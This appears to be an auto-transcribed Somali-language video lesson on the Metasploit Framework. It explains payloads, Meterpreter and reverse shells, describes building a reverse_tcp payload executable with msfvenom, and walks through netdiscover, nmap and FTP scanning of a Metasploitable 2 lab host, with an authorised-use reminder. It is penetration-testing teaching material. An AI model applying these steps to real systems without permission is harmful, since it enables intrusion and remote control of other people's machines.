بسم الله الرحمن الرحيم. السلام عليكم ورحمة الله وبركاته. صلوا صاحبيال meel kastoo aad joogtaan jimco wanaagsan. muuqaalkan maanta wuxuu ku saabsan yahay ciwaan loo yaqaano Metasploit ama tool loo yaqaano Metasploit framework. inta aan muuqaalka gudaha u gelin oo aan faahfaahin dheer ka bixinin, waxaan rabaa inaan kuu sheego aan ka cudur daarto muuqaalkan wuxuu noqon doonaa muuqaal aad u dheer. goobkaaga shaah soo qaado, si tartiib ah muuqaalku daawo hadduu ilaahay idmo insha allah. waxaan rajeynayaa inaad wax uun ka faa'iidi doontid. intaas kadib waxaan rabaa intaan muuqaalka gudaha u gelin inaan u mahadceliyo dhammaan asxaabteena page-ka ku xiran guud ahaan. gaar ahaan waxaan rabaa in aan u mahadceliyo mid ka mid ah asxaabteena oo soo jeediyey in aan muuqaal ka sameyno Metasploit framework. adigana sidaas oo kale haddii aad daneyneysid in aan topic gaar ah muuqaal kasoo sameyno, fadlan nala wadaag oo qaybta commentiga kusoo qor. sidaas oo kale waan kasoo sameyn doonaa. waxaan kaloo rabaa inaan ka faa'iideysto, waxaa jiri doona insha allahu tacaala inaan soo sameyno muuqaal taxane ah oo ku saabsan penetration testingka, gaar ahaan guud ahaan cyber security skillska, haddii ahaan lahayd offensive security ama haddii ahaan lahayd defensive security. marka annaga waxaan jimco walba muuqaal kasoo sameyn doonaa hadduu ilaahay idmo. try hack me platform, fadlan la soco. jimco walba waxaan soo dayn doonaa muuqaal xiiso badan oo xirfada cyber security-ga ama xirfadaha cyber security-ga la xiriiro. daawasho wacan, aad iyo aad u mahadsantihiin. aan gudaha u galna marka. muuqaalkeena wuxuu ku saabsanaan doonaa 4 qaybood oo waaweyn. qaybta koowaad waxay noqon doontaa inaan uga hadalno theoretical part, muxuu yahay Metasploit framework tool, maxaa loo isticmaalaa, qaybaha uu kala qaybsan yahay Metasploit, iyo warbixin kooban oo ku saabsan theory ahaan in aan fahanno Metasploit. markaan theoretical part kasoo gudubno, waxaan u gudbi doonaa 3 qaybood oo full practice ah. maxaan ula jeedaa? waxaan ula jeedaa practice aan gali doonaa markaan theory-ga dhameyno. practice-keenana wuxuu u qaybsanaan doonaa 3 qaybood. qaybta koowaad wuxuu noqon doonaa in aan Metasploit framework anagoo isticmaaleyno aan test ku sameyno, ama aan hagareeno, ama aan compromise ku sameyno, ama aan exploit ku sameyno. ereygaa rabta u isticmaal. boxes ama systems vulnerable ah, either Windows system ha ahaado ama Linux system ha ahaado. waa practice-keena qaybta koowaad. qaybta labaad practice-keena wuxuu noqon doonaa in aan anagoo Metasploit framework isticmaaleyno test ku sameyno system update ah, like Windows 10 oo update ah. wax vulnerability ma lahan, waa patch. haddii systemka aad testiga ku sameyneysa ama hagareyneysid oo update uu yahay adoo Metasploit framework isticmaalaya, toolkan sidee ku tijaabin kartaa ama ku testi gareyn kartaa systemkiisa. okay, qaybta saddexaad oo ugu dambeyso waa qaybta ugu xasaasisan. waxaan tijaabo ku sameyn doonaa marka systemka la compromise gareeyo kadib. systemkii waa hagareysay, gudaha systemka gashay, what's next? maxaa ku xigo? waxaa loo yaqaanaa stepkaas post exploitation. okay, systemka markaa gudaha u gashid kadib, anagoo isticmaaleyno Metasploit framework, maxaan awood u leenahay, maxaan sameyn karnaa ilaa ugu dambeyn aan systemka full control aan ku qabsano, ama full control aan ka helno systemkaas. intaas kadib waxaan rabaa, muuqaalka wuu dheeraan doonaa, fadlan la soco ilaa iyo dhammaadka. qaybaha dambe aad u xiiso badnaan doonaan. waxaan rajeynayaa inaad wax uun ka faa'iidi doontid. haddaba let's start. okay, Metasploit framework. Metasploit framework muxuu yahay? Metasploit framework markaan ka hadleyno waxaa loo isticmaalaa wax loo yaqaano testing ama penetration testing. waxaa isticmaalo ethical hackerska, cyber security engineerska, waxayna u isticmaalaan in ay ku develop garayaan ama ay ku hagaajiyaan exploit-ka ay qorayaan. waa code-ka lagu hagareynayo system kale. markay code-kaas ay qorayaan waxaa la dhahaa code development. okay, marka exploit haddaa maqashid macneed maxaa waaye? code oo la diyaarinayo waaye. marka code-kaas la rabo mustaqbalka in system lagu hagareeyo, markay tijaabinayaan horumarin ay ku sameynayaan development, Metasploit way u isticmaalaan. sidoo kale
koodkii la soo diyaariyay in execution lagu sameeyo asaga naftirkiisa la isticmaalaba ayadana Metasploit way isticmaalaan arrimo badan loo isticmaalaa security professionals way isticmaalaan saan soo sheegnay sidoo kale payload delivery loo isticmaalaa Metasploit payload delivery waxa loo jeedaa payload horta waxa laga wada arki doonaa gadaal ku arki doonaa laakiin muhiimadda payload waxa waaye system marka aad hackeraysid oo exploit ku sameysid waxa u baahan tahay in instructions lagaaga sameeyo ama inaad amaro ka dhex sameysid system gudihiisa markaa gashid ujeeda u gashi awaamirta systemka la jabsado dhexdiisa inaad ka dhex sameysid arabtid cidda awaamirtaas ku sameynayso waxa loo yaqaanaa payload okay payload kaas inaad deliver ku sameysid aad ku gudbisid marka aad systemka targetkaaga aad ku xabishid ayuu ka caawinaa Metasploit moduleskiisa ilaa iyo 5 ugu muhiimsan macnaha qaybaha u kala qaybsamo ilaa 7 qaybood waa laakiin 5 ugu muhiimsan gaar ahaan exploit waa code payload muxuu yahay asagana waa code oo la isticmaalo after markii systemka la hagareeyo kadib asagoo awaamir inuu ku soo gudbiyo ujeedada ay tahay auxiliary waxaan isticmaalnaa mostly scanner laakiin shaqooyin kale oo qabtaa jiro fuzzy oo kale brute forcing inkastoo brute forcing oo aad slow ugu yoosan ku fiicneen laakiin waa loo isticmaalaa laakiin mostly waxa ugu muhiimsan waa inuu scan loo sameeyo encoder wuxuu naga caawinayaa in uu payloadkeena ka dhigo obfuscate waxa waa inuu adkeeyo si looga dhunto detection systemka waxa loo jeedaa antivirus iyo wixii la halmaalo marka obfuscate ayuu kaaga dhigayaa macnaheedu waxa waaye uu adkeena boss exploitation ayadana qaybtan waxaa la isticmaalaa marka system la compromise gareeyo la hagareeyo exploit lagu sameeyo la qabsado gudaha loo galo control intaas oo dhan isku wada duub waxa loo jeedaa system markii la qabsado kadib waxa isticmaal lahayd waay okay gudaha u galna marka exploit mostly wuxuu ku tiirsan yahay rely on payload maxaa yeelay exploit soo u shaqeeyo wuxuu u baahan yahay in marka hore payload la diyaariyo sometimes payloadyada Metasploit framework gudihiisa ku diyaarsan yihiin sometimesna adiga custom payload dhisan doono oo gadaal ku arki doona waxa custom payload loola jeedo okay intaas kadib marka payload muxuu yahay marka payload wuxuu qeexaa marka system la compromise gareeyo kadib maxaa u baahan tahay in lagu soo sameeyo okay badanaa payloadyada waxay sameeyaan wax loo yaqaano shell connection inay ku abuuraan sidoo kale inay ku sameeyaan reverse shell waxa loo jeedo waa arki doonaa iyo in malwares aad ku download gareysid ama aad ku upload gareysid magaciisa muxuu ahaa targetkaaga okay marka always payload shaqada ugu weyn qofka qabto asaga payloadyada waxay u kala qaybsamaan ilaa 4 waay laakiin saddexdana ugu muhiimsan afartooda saddexdan waxay kala yihiin single payload iyo stagers iyo stages single payloadka waa self contained payload waa payload kaligiis shaqeynaya oo stand alone ah oo aan maaragtay loo mareynin in kuwa kale lagu xiro stagers waa payload small maxaa laga wadaa macnaheedu maxaa waaye asaga waxaa loogu talagalay in uu hadhoodii dambe payload kale uu soo dejiyo download the stage kan waa stagers kana waa stage waa mid shaqada noo qaban doono waaye oo hadhoodii full feature yeelan doono laakiin marka hore midkan oo stagerska ah ayaga dhexdoodii ayaa wuxuu ku dhex jiraa C2 ama meesha ay fadhiyaan hackerska oo serveradoodii ay yaalaan oo hadhoodii laga soo dejin doono payloadka saxda ah marka mostly stagers waxa loo yaqaanaa downloaders okay stagekana waa midka la soo dejiyay oo qaban doono shaqada ugu muhiimsan after markii successful connection la helo oo muxuu leeyahay marka stageska wuxuu leeyahay full feature payload like Meterpreter oo aan gadaal dambe ku arki doono Meterpreter waa meesha awaamirta laga siiyo systemka la jabsaday awaamirta la siinay maxaa waay file isoo download gareey file upload gareey waxaan rabaa microphone codka iga duub waxaan rabaa iraadi confidential sensitive information waxaan rabaa amarad meesha laga bixiyo waxa loo yaqaanaa payloadkan Meterpreter waa payload laakiin wuxuu ka sii yahay stage payload okay intaas kadib Meterpreter wuxuu awood u leeyahay waxyaabahan oo dhan file system access file system waa laf dhabarta operating system walba okay privilege escalation ina sameys mesela marka sameynaysid
attacking ka marka ugu horeeyo normal user heli doonta userka normalka ina ka gudubtid oo u gudubtid admin user ayuu ka caawinayaa Meterpreter persistence ina sameysid system dhex gashid keylogin keyboardyada wax walba oo targetkaaga uu ku qoray ina ogaatid okay screenshot capture whatever waa badan yihiin awaamirta laakiin intaan waa tusaalayaal waxa soo dhan yaa ku sameyn karo Meterpreter marka Meterpreter waa payload see loo sameeyaa custom payload hadda maxaan soo sheegnay payloadyada either waa mid automatic ah oo by default oo marka gashid Metasploit gudihiisa ka sameysmi doono oo exploit ka qaadanaysid payload ku haboon automatic system ka ku xuli doono marna waa mid marna waa mid custom ah oo adiga aad sameysan doontid custom kana waxa sameeyo tool loo yaqaano MSF Venom waa arki doonaa waxa loo isticmaalo MSF Venom waa wuxuu sameeyaa custom payload waxa loo isticmaalaa inaad ku generate grace ku sameysid custom payload marka custom payload kaasna wuxuu formatkiisa uu yahay multiple support gareena OS oo Windows ah Linux Mac whatever platform badan ku sameysan kartaa payloadka adiga arabtid sida loo sameeynaayna waa sidaan MSF Venom waa toolka -b oo payload u dhigmata ay sameey payloadka noocan kara waa window way Meterpreter noocan kara waxa payload Meterpreter ina ay sameysid kadibna connection inuu iyo abuuro reverse TCP ah reverse TCP muxuu yahay horta qaybtan aan wax yar dul istaagno wax yar raali noqda okay reverse TCP beint aan furano reverse TCP markaan ka hadlayno in cyber security markaan rabno inaan isticmaalo Metasploit framework connectionada mostly la sameeyo waa laba nooc ka soo qaad adiga waxa tahay as attacker halkaan joogta kana waa targetkaaga either host oo hal xaba ahaado ama server ha ahaado marka connection la sameynaysid ka soo qaad connection aan dhacay connection kan marka adiga sameynaysid as attacker ahaan ah okay oo qofkan targetkaaga ah tii aan soo gaabino oo asaga ku dhageysanayo ina connection la sameysid oo asaga listener uu yahay macnaheedu waxa loo yaqaanaa connectionka noocaas ah bind shell okay bind shell markii connectionka laakiin oo targetka uu kula soo sameynayo oo adiga as an attacker aad tahay listener oo in lagu soo xiriiro connection lagu soo sameeyo aad sugaysid waxa loo yaqaanaa reverse shell okay maxay faa'iido ku leeyihiin reverse shell iyo bind shell faa'iidooyinka ay ku leeyihiin maxaa waay anaga hadda waxaan xulanay reverse shell in anagana la soo xiriiro targetka oo la soo xiriiro payloadka aan sameynayno wuxuu sameyn doonaa targetka marka uu click siiyo connectionka dhankiisa ka imaan doona in sidoo oo anaga dhankeen intuu ka imaan lahaa oo asaga oo listener ahaan lahaa way oo anaga reverse shell u xulanay waxa u xulanay mostly connectionada si loo sameeyo halkan waxa ku jiro firewall waxa loogu talagalay traffic walba oo local network gudaha u soo galayo in lagu control filter lagu sameeyo la ogaado cidda anagana la soo xiriirayso saas daraadeed firewallkeena haddii connectionka uu gudaha u soo galayo oo targetka listener uu yahay uu block gareena mostly laakiin markii targetka oo out uu sameynayo oo macnaheedu uu tahay outbound traffic markuu yahay mostly firewallka ma qabanayo wuxuu leeyahay trafficgan animo iso socmay soo banaanka ma aha riskigiisu uu yar yahay uu leeyahay mar walba banaanka la aadayo riskiga firewallka uu yaraya illa explicitly hadii firewallka markii la joogo enterprise level oo organizationada waaweyn laga hadlayo waxa loo sameyn doonaa wax loo yaqaano policygaas marka muxuu noqon doonaa in iyo outbo in filter lagu sameeyo oo userada explicitly meel gooni loo ogol yahay inay booqdaan ma ogiye inta kale laga xanibi doono laakiin generally firewallku wuxuu u shaqeeyaa in uu inbound oo xooga uu saaro inbound macnaheedu waxa waaye wax aniga soo galayo outbound macnaheedu waxa waaye wax iga baxayo marka connectionka reverse shellka macnaheedu waxa waaye firewallka waxa waa triggereynona in connectionkan uusan naga xanibin oo uu naga diidin waxaan leenahay reverse shell connection noogu sameeyo oo anaga aan listener noqono oo in la soo xiriiro aan sugno okay cidna la soo xiriireysana ha noqoto targetkeena taasoo macnaheedu ay tahay inuu success noqdo payloadkeena ama uu safe noqdo
oo hadhoodii aan firewallka naga hor istaagin. Okay, kadibna waxaa leedahay hadhoodii waa arki doonaa wax loo yaqaano aan laserkeena qaadano. waxaan sameyn doonaa lhost oo ah local host waxaa waaye attacker machine. lport oo ah albaabka ama portiga adiga in lagala soo xiriiro aad rabtid. By default Metasploit 444 by default laakiin waa bedeli kartaa waxaa rabtid ka dhigan kartaa. -f waa file format, exe aan rabnaa. exe macnaheedu waxa waaye wax oo double click in la sii u baahnaan doono, waa file executable file waaye. kadibna magaciisa -o waa dhigi kartaa, calaamadan greater than waa dhigi kartaa, payload.exe. formatkan waa formatka lagu sameeyo custom payload adoo isticmaalayo MSF Venom. Okay, common mistakes kala sameeyo waxaa ka mid ah in lhost iyo lport oo qalad ah oo qofka payloadka markuu sameynayo inuu geliyo. مثلا port 444 uu geliyo, hadhoodii Metasploit markuu isticmaalayo port 222 ama 445 camal inuu geliyo oo markaas mismatch uu ka dhaco connectionka asaas ku weysid. in aad marka hore start ku sameysid listenerka, marka hore waxaa la rabaa inta aadan payloadka forward ku sameynin ama delivery payload sameynin oo targetka aadan payloadka u dirin, waxaa la rabaa horta inaan connection start listener inaan sameysid. waa arki doonaa sida loo sameeyo. mismatch operating system in uu dhaco oo sida hadda aan ka hadlayna. waxaan rabaa in aan xasuusiyo teamka fadlan u isticmaal penetration testing markaa sameynaysid box ama system lagu ogol yahay oo kaliya, ama lab practice samee sida hadda anaga lab aan u isticmaalayno oo kaleete, yacni system vulnerable ah loogu talagalay jiro ku sameey. Okay, system aan lagu ogolen ha ku tijaabinin. homework ayaan idin diri doonaa. homework maxaa waaye, waxaa ku shubataa Metasploitable 2 kadibna scan ku samee, nmap isticmaal, nmap scan isticmaal. markaa vulnerability soo heshid mid kamid ah soo qaad vulnerability-yadooda kadibna exploit ku sameey. haddii uu ku hirgalo commentiga videoga igu soo reeb. waxaan hadda u gudagalaynaa practice-keena. Okay, let's do practice. waxaan haysanaa markaa labkeena, waxaan haysanaa saddexdan system. kan waa Windows 10 oo ah fully updated, Metasploitable 2 oo ah Linux server, iyo Windows 7 oo isagana noo noqon doono vulnerable Windows. Okay, IP-yada ay kala wataan, midkan wuxuu haystaa 128, midkan isagana wuxuu haystaa 129. waxaan isticmaali doonaa Kali Linux. Okay, kan hoos iga dhig. Kali Linux markaan isticmaalayno, step ugu horeeya marka intee hawshan ka bilaabanaya, waxay ka bilaabanaysaa before inta aanan gudaha u gelin. waxaan rabaa horta inaan wax yar ku tusiyo Metasploit framework soo eegaya. horta sudo msf console. Okay, cd user share Metasploit framework. Metasploit framework halkan uu ku jiraa. haddaad rabto inaad sii baarbaartid user share Metasploit framework haddaad dhahdid wuxuu ku tusinayaa dhammaan xogtiisa. annaga moduleska aan ka hadlayna halkan uu ku jiraa. applicationka markaa ran garaynaysidna hadda waataan ku ran garaynay msf console. markaa ran garaynaysid maxaa dhahaysaa msf console. Okay, hadda enter dhahdid just intaas way kaaga filan tahay. hadda as a root inaa u ran garaysa arabtidna saasaa leedahay, kadibna user passwordkiisa ayaad gelinaysaa. waxaan toos kugu soo kici doono halkaan ku keeni doonaa. waa kaa sudo msf console dhahnay. kadib Metasploit-ka sidaan oo keena. marbo bannerkan kan waxaa loo yaqaanaa banner, marbo sharaxaad nooc kale ah, marbo ku imaanayso waa iska wax oo maaragtay fan ah waay. marka gudaha u soo gashid, aniga waxaan isticmaalayaa Metasploit versionkiisa version 6 ah. waxaa ku jiro 2529 exploits ah. waxaa ku jiro 1300 auxiliary ah, post exploitation payload 1600 oo mara. waxaan waa module kiisa waay, waa waxa hadda aan idin tusin rabay module-ka kuwan waay. Okay, haddaad dhahdid cd modules ls dhahdid waa module-adan. kan waxaa ku jiro 1300, kan something evasion exploit 2500, payload 1600. aan gudaha si fiican ugu aragno Metasploit waa kana. Okay,
annaga markaan rabno marka Metasploit inaan wax ka dhex raadino inaan shaqo ka qabano practice keeniya ku dhex baran doonaa laakiin mostly waxaa isticmaali doontaa command-yada set command waa arki doontaa waxaa arki doontaa use command waxaa arki doontaa search intaan isticmaali doono intaas u badan okay use command waxaa isticmaaleynaa markaan exploit rabno inaan isticmaalno set command-na waxaa isticmaaleynaa markaan payload rabno inaan isticmaalno okay payload markaan rabno inaan isticmaalno markaan rabno local host inaan set up gareyno markaan rabno remote host inaan set up gareyno markaan rabno session inaan set up gareyno markaan rabno wax walba oo la rabo in lagu set up gareeyo MSF console gudihiisa set up isticmaale use-na waxaa isticmaali doontaa marka exploit rabtid search-na markaad something aad raadinayso مثلا search waxaad tiri FTP SSH okay SMB markaa rabtid wax in lagu raadiyo search aan dhahay hada search SMB aan dhahay wuxuu ii soo qabtay 449 shay oo qusayso SMB haddaan مثلا rabo SMB gan midkan waa payload midkan waa auxiliary midkan waa post midkan waa Windows something Linux wax isku jira waa مثلا haddaan rabo wax gaar ah inuu ii soo qabto kale search SMB waxaa leedahay platform laba dhibcood Windows wixii Windows ah bis ii raadi hadda Windows kaliya ma ku soo qaban kariyo ku dhahay laakiin waxa dhigi kartaa waayahay type no isticmaali kartaa type waxa dhehaysaa meesha ah hadda exploit post exploit payload wax dhan auxiliary isku dardar lahayd auxiliary bis la iraadi bis okay auxiliary bis iraadi haday meesha 400 jab had muxuu ka dhigay 82 taasoo macnaheedu ay tahay in aad filter ku sameyn kartid marka gudaha isticmaalaysid haye hadii la rabo payload oo kaliya maxaa leedahay search SSH waxaa raadsaa type waxaa raadsaa payload okay muxuu ku soo saaray 4 xabo payload generic SSH payload PHP payload CMD marka fiirsidna payload kan muxuu ka yahay mid generic ah generic waxa waaye waa u isticmaali kartaa wax walba PHP kan khaas u yahay kan CMD oo khaas u yahay gaar ahaan Unix gaar ahaan reverse SSH ku sameeyna rankigiisa wuxuu ku leeyahay waa iska normal okay description ka check no kuwa qaar waxaa jiro date-ka ku tusinaya مثلا waxaa dhahdaa search waxaa iraadaysaa SMB type waxaa iraadaysaa exploit 261 exploit oo soo saaray SMB ah mujeda kan 2024 la soo saaray rankigiisa waa excellent waa la jeegreeyay waxa waaye description kiisana waa kan halkan uu ku qoran yahay remote code execution RC hada aragtid waa remote code payload kan maxaa waaye multi hada aragtid macnaheed maxaa waaye exploit oo u isticmaali kartid multiple operating system Windows kaliya ma kan laakiin fiiri exploit noocan fiiri SMB gan Windows bis ah loogu talagalay exploit oo qaas u ah Windows kaliya wax kale oo isticmaali kartid ma jiro great excellent something yani good normal manual macnaheed maxaa waaye rankigiisa kaliya adiga marka midka kugu haboon ayaad isticmaali doontaa qaarkood waxa laga yaabaa ayagoo excellent ku dhahayo in ay ku shaqeyn weyso another exploit kale ta raadinaysa qaar waxa laga yaabaa inuu manual ama normal ama good oo iska ka dhaho ayaysidna in uu shaqo fiican ku qabto marka tijaabo badan iyo test badan ayuu u baahan yahay intaan waa gudaha MSF console ama Metasploit sida wax looga raadiyo annaga maxaa raadineen inta ka bilaabeena marka step number 1 in aad systemka ku sameysid information gathering okay kaba soo qaad systemkaaga waa heshay IP addresskiisa net discovery waa command iska local lagu helo ETH0 internet kadibna range waxa raadineena range 192.168.26.0/24 kan maxaa ula jeedaa like ina IP addresska aan ku raadiyo local network inaan raadiyo marka hadhoodii test aad sameynaysid hadduu local network uusan ahayn public IP-giisa ina raadiyo sidee noqonaysaa public IP-yadana sida loo raadiyo waxaad sameyn kartaa command loo yaqaano مثلا bing oo kale ina isticmaashid bing google.com hada dhahdid wuxuu ku siinaa public IP-gooda bing oo kaliya hadaa rabtid inaad si public ah u ogaatid IP oo targetkaaga uu leeyahay qaab badan oo ku ogaan kartid jiro مثلا inaad dhahdid
sudo ns lookup kadibna aad aadid مثلا google.com oo kale. okay xogsina IP address ka oo Google uu leeyahay oo saxda ah waa kana name-ka waa Google, IP address kan uu leeyahay adiga doodii target kaaga public IP giisa sidaas ku soo heli kartaa. haddii private IP raadinaysidna macnaheed maxaa waaye local network marka hal network aad ku wada jirtiin sidaan oo kale ku raadin kartaa inaad aadid sudo netdiscover -i oo ah interface ethernet 0 ethernet waxa waaye adapterka aniga isticmaalayo. hadaa fiiriso adapterkayga aniga ifconfig adapterkayga waa kana ETH 0 waxaana ahay IP gaanan deganahay. marka fiirisid marka commandiga hadda aan isticmaalnay muxuu noo soo saaray markaan isticmaalnay adapterka kadibna maxaan dhahnay range oo ah range-ga oo halkan subnet oo kaliya iraad hadaadan subnet-kan range-giisa siinin wax badan waqti kaaga lumin doona oo raadin doona. marka IP address-deena waa kana. okay wixii default gateway iyo markii laga reebo IP-yada saxda ah waa labadan midkan waa Windows-ga kana waa Linux-ka. okay clear. halkan markaan joogno marka step ugu horeey maxaa waa IP-ga waa soo ogaatay waxa u baahan tahay in aad ku sameysid scan step 2 scanning. scan markaa sameynaysa marka waxaa isticmaashaa sudo nmap. okay waxaa isticmaalaysaa hadda IP-yadu waa ogtahay inay live yihiin ay shidan yihiin haddaadan ogeyn IP-yada inay live yihiin ss aa isticmaalaysaa -ss kadibna waxaa isticmaalaysaa -sv ss maxaa waaye scan ku samee as adoo u diraayo TCP IP-ga qaybta sync flag. by default nmap wuxuu sameeyaa laba shaqo qabtaa. kow wuxuu fiirinaa host alive bing uu sameeyna ICMP oo diri doona. number 2 maxaa waaye port scanning inuu markaas bilaabo. step-kan inaan ka boodnaa rabnaa si waqti noogu maaragtay step-kan host alive hostigan mashiidan ya tijaabi waxaas ha gelin port scan samee. marka start dhehaysid marka oo hawsha gudaha toos u galaysid waxaa isticmaali doontaa capital BN. okay -ss okay oo scan port scan ku samee dash waxaa sameysaa SV all waxaa sameysaa versionada port walba isoo ogow kadibna portiyada dhan aan u baahana in scan lagu sameeyo -bd -b kadibna waxaa dhahdaa waxaan kaloo rabaa haddii lacala vulnerability baaraysid script ku dareysaa oo ah full laakiin xog badan uu ku siin doonaa. kadibna boxigaagi ku dari doontaa 128 kadib waxaa dhehaysaa save garey kadibna waxaa dhehaysaa meta itoora u save garey amalena exploit.txt saasaa leedahay enter sub intuu kaaga dhameynayo. haddii sidaan markaa sameynaysid maadaama all ports aad dhahday time badan uu qaadan doonaa waxaa fiican inaad ku darsatid -t5 ama 4 oo kale oo u dhigmato speed ku soco fadlan dedeji xawaaro badan ku shaqeey. haddii aad rabtid in aad ogaato waxyaabahan aniga hadda flagskan isticmaalay nmap inaa imaadid waxaan sameyn doontaa -help waxaa ogaanaysaa wax walbo nmap-ka uu leeyahay. waxaan haddii aad rabtid inaan maaragtay video kusoo sameeyo fadlan commentiga igu soo reeb nmap oo faahfaahsan waan ku sameynaynaa haddii aad daneynaysid. intaas kadib markaad scan ku sameysid laba scan sameey labadooda faa'iido ay ku leeyihiin maxaa waaye waxay ku leeyihiin like tusaale ahaan aniga hadda waxaan haystaa labada scan uu ku sameeyey metasploit 2 iyo metasploit. aan soo qaban marka waxaa dhahdaa less command isticmaal waxaa isticmaashaa metasploit.txt. kan muxuu yahay waa arki doontaa less macnaha command tartiib ugu soo bandhig waaye kan waa midka full-ka ah. okay mujeda full maxaa ula jeedaa script-ga la socdo portigana furun uu ku leeyahay macluumaad dheer uu ka siinaa isla portiga wuxuu ku leeyahay vulnerable waaye waa exploitable portigan surface-kana running gareynayo portiga waa port 21 TCP state-kiisa waa open oo furan yahay surface-ka waxaa run gareynayo FTP reason-ka waa sync loo diray kadibna version-kan ayuu isticmaalayaa. marka script vulnerability wuxuu ku siinaa haddii vulnerability uu leeyahay iyo haddii kale uusan lahayn. marka haddaad scriptiga siisid xog badan markaa si tartiib ah inaa u fiiris arabtida la isticmaalaa.
nooc scriptiga raacsiisaneen marka control c dheh q ka bax okay to midkan waa nooc caadiga ah oo script aan la soconin maxaa waaye full wuxuu ku siinaa scan laakiin aan la soconin boorti walba faahfaahintiisa gaarka step 2 marka maxaa sameysay scan ku sameysay scan markaa ku sameysid oo resultigan aa heshid macnaheed maxaa waaye intaanoo boorti furan mid walba versionkiisa versionada markaa fiirsid marka faa'iidada uu leeyahay waxay tahay boorti walba surface karangareeno ftp soo maaha specific versionkan uu leeyahay ayaa soo qaadanaysaa kadibna waxaa la aadi doontaa online waxaa dhihi doontaa copy waxaa dhihi doontaa waxaan rabaa inaad ilaalisid exploit oo la xiriiro this version fadlan iraadi marka saas online ka ugu raadisid waxaan oo dhan waxay ku siin doonaan wixii xog oo boortigan furan versionka surface-ka ftp ga versionka noocaan ah exploitation haduu leeyahay ayaa online ka raadinaya stepka marka iyo faa'iidada uu leeyahay version inaad heshid waa sidaas sidoo kale waxaa sameyn kartaa versionka inaad local database-ka in aad ka baartid maxaa sameynaya waxaa leedahay like this kan maaha inta imo waxaa leedahay clear waxaa leedahay search exploit control shift v versionkan bisa kusii daynaya search exploit maxaa waaye waa local database uu leeyahay Kali Linux-ka oo laga baaro wax walbo exploitation uu haayo systemka Kali Linux ku set upgrade hadda online internet aadan haysanin oo aan rabtid in Kali Linux oo exploitation uu ku diyaarsan yahay si ku baare online kan ina aad marabtid search exploit aadisa versionka ku leedahay past kadibna wuxuu ku siinaa exploit title-ka aad raadinaysid hadii uu Linux ku dhex jiray hadii kale wuxuu leeyahay waa haya vs ftpd vulnerability uu leeyahay exploitation kiisana waa diyaar backdoor command execution ayaan ku haya sidoo kale metasploit ka xitaa waxa ka dhex heli kartaa wallahi mikela aha okay metasploit ka imaanaysa kadibna hadhoodii halkaan aad ka raadinaysaa waxa leedahay search ftp markaad aadid ftp 500 iyo dhowr oo ku keenay baaritaankeeda saa u gali doon arkeena okay marka halkaan fiirisid marka fiiri versionkan ina heshid waa very important marka iskana marka hore sameeyne versionka raadinaysa surface-ka raadine surface-ka waa protocolka iyo versionki sometimes versionada ma arki doontido uu isku dhex yaacsan yahay kan hadda waa sax kan waa ujeeda kan 9.4.2 kan 2.2 kuwan oo kale laakiin aan versionka lahayn oo mesela 3.x macnaheed maxaa muuqu ma yaqaano 3.xy versionkiisa ilaa 4.x oo u dhaxeeya ma xaqiijin karo qaab loo raadiyaa jiro waa arki doonaa qaabka loo raadinayo okay aan marka exploitation keena gudaha u galna marka anagoo ka faa'iideysanayno ftp portigan openka ah surface-kan isticmaalo surface-kan copy noo soo dheh kadibna waxaana keentaa msf console waxaa dhehaysaa clear waxaa dhehanaa search waxaan leenahay control shift v ftp nuuraadi ftp xog badan uu kaasii laakiin adi hadda exploit marabna marka walba oo adiga aad sameynaysid exploitation waxa fiican auxiliary ina marka hore isticmaashid aad scan iyagu sameey ejgray locally msf console dhexdiisa scan ku sameey scanki hore en maabo aha scankan maxaa waaye vulnerability iyaga dhexraadi systemkeega see loo baaraa marka waxaa leedahay search ftp type auxiliary okay waxaa leedahay scan ku sameey hadday meeshii aad wax badan hadda filter ku sameey content 7 now hadda waxaan fiirineynaa auxiliary scanner waxaan rabnaa versionkii inaan soo helno ka soo qaad auxiliary scanner auxiliary DOS anaga auxiliary scanner waxaan raadineynaa oo ku haboon kuwa scannerka ah waxaan ka raadineynaa mid version detection ah okay auxiliary scanner ftp version kan oo kale copy soo dheh see loo isticmaalaa marka laba hab waa sameyn kartaa ina meesha kan uu ku jiro ftp server 16 ku jira scanner kan 17 ku jira inaad dhahdid use 17 inaad dhahdid waa sameyn kartaa oo hadda 17 aho wuxuu ku siinaa scanner ftp version ama inaad dhahdid use control shift v waxa soo copy gareysatay inaad pass ku dhahdid labadaba waa same kadib waxaa dhahday auxiliary-gan oo scanner-ka ah isticmaal
maxaa marka aniga options oo liiga baahan yahay options hadaa dhahdid wuxuu ku siinaa Metasploit framework saa u isticmaashid wax loo yaqaano guidance inuu ku hago required meesha ku qoran oo yes ah laga rabaa inaad soo buuxisid waxa required r hostna waa targetka aad rabtid in scan lagugu sameeyo oo ah Linux targetkeena marka waxaan leenahay set haday maxaa idin dhahay marka wax la set up gareynayo isticmaalay set marka r host waa remote hostiga aan rabno inaan gaarno waa IP addresska uu isticmaalayo Metasploit Linux waa 192.168.206.128 okay kana rabna inaan tijaabino 192.168.206.128 kadib options marka la idin ama show options labadaba waa dhigi kartaa same way waxa waaye wax walba oo required laga rabay oo yes ku qornaa ku sid upgrade kan yes waa laga rabaa laakiin by default asaga ku soo qabtay threadka waa laga rabaa by default one ku geli macnaheedu maxaa waaye one operating system ayaad baaritaan ku sameey rabtaa hadaa rabtid thread waxa loogu talagalay مثلا Metasploit meeqa operating system ayaa hal mar in lagu sameeyo scan arabta okay maximum one per host ay u golyahay hadkan laakiin meelaha qaarkiis maximum one per hostigan haduu sameeyaan macnaheedu waxa waaye threadkan inaad bedeshid 5 6 7 ka dhigan kartaa macnaheedu maxaa waaye 5 hadaan ka dhigo 5 operating system hal mar baaritaan ugu sameeyay intii aad hal marka baaritaan sameys aad dhameeysid mid labaad baaritaan ku sameys aad dhameys mid saddexaad baaritaan ku sameys aad dhameys oo saas marba mir aad sameeyay waqti badan ku bixin lahayd mid inaad u sameysid waxaad dooranaysaa مثلا 5 operating system rabtaa 5 IP rabtaa in scan lagu sameeyo hal mar inta thread waxa ka dhigaysaa 5 IP u dhaxaysiinay kadibna hadhoodii 5toodii hal mar oo scan ku sameeyna anaga laakiin kan hadda wuxuu noo ogol yahay maximum 1 per host hal IP halka IP uu noogu jira boortii by default isaga soo qabtay wax kale oo laga rabo malahan just waxa leedahay run marka dhahdid calaamadan cagaarta oo balaasta waxay u dhigantaa khayr waay macnaheedu xogta waa lagu soo qabtay waay versionkii uu soo helay uu leeyahay operating system kan waa verify macna confirmation xaqiiq waxa uu haysataa in uu version kan uu leeyahay boxigan Linux marka saas u soo hubisid scan ku sameysay scan completed markuu ku dhaho kadib waxa leedahay search control shift v type 